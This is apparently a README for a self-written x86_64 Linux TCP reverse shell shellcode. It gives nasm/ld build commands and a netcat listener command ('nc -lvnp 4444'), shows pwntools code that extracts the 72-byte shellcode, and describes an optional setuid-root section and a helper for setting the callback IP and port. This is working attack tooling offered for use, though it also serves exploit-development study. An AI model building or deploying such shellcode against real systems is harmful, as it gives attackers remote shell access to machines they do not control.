Linux TCP reverse shell for x86_64 architecture.
This is sort of a continuation of the KiD project, instead of generating a shellcode using msfvenon, it's written by me.
Assembling and linking:
nasm -f elf64 reverse.asm
ld reverse.o -o reverse
It works as expected on its own, catch the shell with nc -lvnp 4444
Get the shellcode/opcode with pwntools:
>>> from pwn import *
>>> file = ELF("reverse")
>>> shellcode = file.section(".text")
>>> print(shellcode.hex())
Or print it with \x
notation for C programs:
>>> print(''.join(f'\\x{byte:02x}' for byte in shellcode))
The shellcode is 72 bytes in size (2 bytes smaller than msfvenom), null byte free if IP and port contains no 0.
There's a section to set uid to root, it's commented out since it won't work if the account executing the shellcode is not root, uncomment if root will be executing.
I've also included a simple script to convert IP and port to hexadecimal in little endian to easily modify the reverse shell.
./ 4444
Change the IP and port at line 20 and 21.